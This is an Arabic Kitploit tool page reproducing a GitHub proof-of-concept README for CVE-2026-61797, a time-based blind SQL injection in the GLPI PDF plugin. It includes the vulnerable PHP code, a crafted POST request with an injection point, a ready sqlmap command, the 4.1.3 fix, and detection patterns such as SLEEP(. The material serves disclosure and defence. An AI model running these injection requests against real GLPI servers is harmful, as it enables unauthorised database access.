Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-61797 — إثبات مفهوم لـ CVE-2026-61797، وهو حقن SQL أعمى قائم على الوقت في إضافة GLPI PDF، مع التحقق عبر sqlmap وإرشادات الكشف. | Kitploit
أدوات/GitHubGitHub/itres-labs/cve-2026-61797
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالتعلم والتعليم
GitHubitres-labs/cve-2026-61797

CVE-2026-61797

إثبات مفهوم لـ CVE-2026-61797، وهو حقن SQL أعمى قائم على الوقت في إضافة GLPI PDF، مع التحقق عبر sqlmap وإرشادات الكشف.

عرض المستودع
منذ يوم واحدلم تتم المراجعة بعد
الموقع الإلكتروني

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-61797 — حقن SQL أعمى قائم على الوقت في إضافة GLPI PDF

إثبات مفهوم لـ CVE-2026-61797، وهي ثغرة حقن SQL أعمى قائمة على الوقت تؤثر على إضافة GLPI PDF.

يمكن الوصول إلى الثغرة من خلال:

root@kitploit:~
/marketplace/pdf/front/preference.form.php

في التنفيذ المصاب، يتم إدراج القيم التي يتحكم بها المستخدم من مصفوفة item في طلبات POST داخل استعلامات SQL دون معاملات مناسبة.

يمكن لمستخدم GLPI مصادق عليه بصلاحيات منخفضة استغلال هذا السلوك لحقن تعبيرات SQL واستنتاج معلومات قاعدة البيانات من خلال توقيت الاستجابة.


الثغرة

الحقلالقيمة
CVECVE-2026-61797
المنتجGLPI PDF Plugin
الإصدار المُختبر4.1.2
الإصدار المُصلَّح4.1.3
الثغرةحقن SQL أعمى قائم على الوقت
المصادقةمطلوبة على الفرع المُختبر 4.1.2
ناقل الهجومالشبكة
تفاعل المستخدملا شيء
قاعدة البياناتMySQL
CVSS6.1 / 10
الاستشارةGHSA-wwr3-v347-c64m

يضع الكود المصاب في النهاية المفتاح item الذي يتحكم به المهاجم داخل حقل tabref في عبارة INSERT الخاصة بـ SQL.

من الناحية المفاهيمية، بدت العملية المصابة كما يلي:

root@kitploit:~
foreach ($_POST['item'] as $key => $val) {
    $DB->doQuery("INSERT INTO `glpi_plugin_pdf_preferences`
        (`id`, `users_id`, `itemtype`, `tabref`)
        VALUES (
            NULL,
            '" . $_SESSION['glpiID'] . "',
            '" . $_POST['plugin_pdf_inventory_type'] . "',
            '$key'
        )");
}

نظرًا لأن $key يصبح جزءًا من عبارة SQL، يمكن لمفتاح مصفوفة مُصمَّم تعديل الاستعلام الناتج.


المتطلبات

يتطلب إثبات المفهوم:

  • نسخة GLPI تعمل بإصدار مصاب من إضافة PDF.
  • جلسة GLPI صالحة ومصادق عليها.
  • رمز CSRF صالح.
  • sqlmap.
  • تصريح لاختبار الهدف.

تم التحقق من إثبات المفهوم مقابل PDF Plugin 4.1.2.


إثبات المفهوم

التقط طلبًا شرعيًا إلى:

root@kitploit:~
POST /marketplace/pdf/front/preference.form.php

واحفظه باسم:

root@kitploit:~
glpi.sqli

جسم طلب بسيط مناسب لتحديد نقطة الحقن هو:

root@kitploit:~
plugin_pdf_user_preferences_save=1&plugin_pdf_inventory_type=Computer&item[0*]=1&_glpi_csrf_token=<CSRF_TOKEN>

تخبر * أداة sqlmap بالجزء الذي يجب اختباره من الطلب.

مثال على بنية الطلب:

root@kitploit:~
POST /marketplace/pdf/front/preference.form.php HTTP/1.1
Host: glpi.example.test
Content-Type: application/x-www-form-urlencoded
Cookie: <VALID_GLPI_SESSION>

plugin_pdf_user_preferences_save=1&plugin_pdf_inventory_type=Computer&item[0*]=1&_glpi_csrf_token=<CSRF_TOKEN>

التحقق باستخدام sqlmap

شغّل:

root@kitploit:~
sqlmap \
  -r glpi.sqli \
  --csrf-url "https://glpi.example.test/front/preference.php" \
  --csrf-token "_glpi_csrf_token" \
  --cookie "<VALID_GLPI_SESSION>" \
  --technique=T \
  --level=5 \
  --risk=1 \
  --batch

يجب تحديد التثبيت المصاب على أنه يقبل حقن SQL أعمى قائم على الوقت عند نقطة الحقن المخصصة في POST.

يشبه الكشف النموذجي:

root@kitploit:~
Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind

تعتمد التقنية على تأخيرات MySQL الشرطية مثل SLEEP() لتحديد ما إذا كان الشرط المحقون يُقيَّم إلى صحيح.

يحد هذا المستودع عمدًا من إثبات المفهوم الموثق إلى التحقق من الثغرة ولا يوفر أوامر لاستخراج قاعدة البيانات أو استخراج بيانات الاعتماد.


التفاصيل التقنية

يصل الطلب المصاب إلى:

root@kitploit:~
plugins/pdf/front/preference.form.php

يعالج التطبيق قيمًا مشابهة لـ:

root@kitploit:~
item[<USER_CONTROLLED_VALUE>]=1

يحوّل PHP هذا إلى مصفوفة ترابطية، حيث يتحكم المهاجم في مفتاح المصفوفة.

يُستخدم هذا المفتاح لاحقًا كـ $key بواسطة الإضافة، وفي الإصدار المصاب، يتم دمجه مباشرة في عبارة SQL.

تدفق البيانات الناتج هو فعليًا:

root@kitploit:~
HTTP POST
   |
   v
$_POST['item']
   |
   v
array key ($key)
   |
   v
SQL string concatenation
   |
   v
MySQL

لذلك يمكن لحمولة قائمة على الوقت التأثير على تعبير SQL وجعل قاعدة البيانات تؤخر الاستجابة عمدًا عندما يكون الشرط المُقدَّم صحيحًا.

نظرًا لأن التطبيق لا يعيد نتائج استعلام SQL مباشرة، يتم الاستغلال كـ حقن SQL أعمى.


التصحيح

تم إصلاح المشكلة في PDF Plugin 4.1.3.

تم استبدال عمليات SQL الخام المصابة بآليات قاعدة بيانات/ORM أكثر أمانًا ومنطق تفويض إضافي.

يجب على المستخدمين الترقية إلى:

root@kitploit:~
PDF Plugin >= 4.1.3

أو إصدار أحدث مدعوم.


الكشف

قد يرغب المدافعون في مراجعة طلبات HTTP التي تستهدف:

root@kitploit:~
/marketplace/pdf/front/preference.form.php

بأسماء معاملات item[...] غير المعتادة.

تشمل الأنماط المشبوهة بشكل خاص صيغة SQL أو دوال تأخير الوقت التي تظهر داخل مفتاح مصفوفة، على سبيل المثال إشارات إلى:

root@kitploit:~
SLEEP(
SELECT
AND
OR
||
'
"

قد تشير أيضًا طلبات POST المتكررة إلى نقطة النهاية متبوعة بتأخيرات استجابة متسقة لعدة ثوانٍ إلى محاولات استغلال حقن SQL أعمى قائم على الوقت.


الاستخدام المسؤول

يُقدَّم إثبات المفهوم هذا حصريًا من أجل:

  • البحث الأمني؛
  • التحقق من الثغرات؛
  • اختبارات الاختراق التي تُجرى بتصريح؛
  • التحقق الدفاعي؛
  • هندسة الكشف.

لا تستخدمه ضد أنظمة لا تملكها أو ليس لديك إذن صريح باختبارها.

لا يتحمل المؤلفون أي مسؤولية عن الاستخدام غير المصرح به أو غير القانوني لهذه المواد.


الشكر

بحث الثغرة والتحليل التقني الأصلي:

ITRESIT Labs — Javier Medina

البحث الأصلي:

https://labs.itresit.es/2026/09/14/source-driven-recon-when-the-patch-becomes-the-poc-and-what-cve-2026-61797-taught-us-about-disclosure-opsec/

CVE:

root@kitploit:~
CVE-2026-61797

استشارة أمان GitHub:

root@kitploit:~
GHSA-wwr3-v347-c64m

إخلاء المسؤولية

هذا المستودع مخصص لأغراض تعليمية واختبار أمني مصرح به فقط.

احصل دائمًا على إذن صريح قبل اختبار الأنظمة التي لا تملكها.

تنزيل الأداة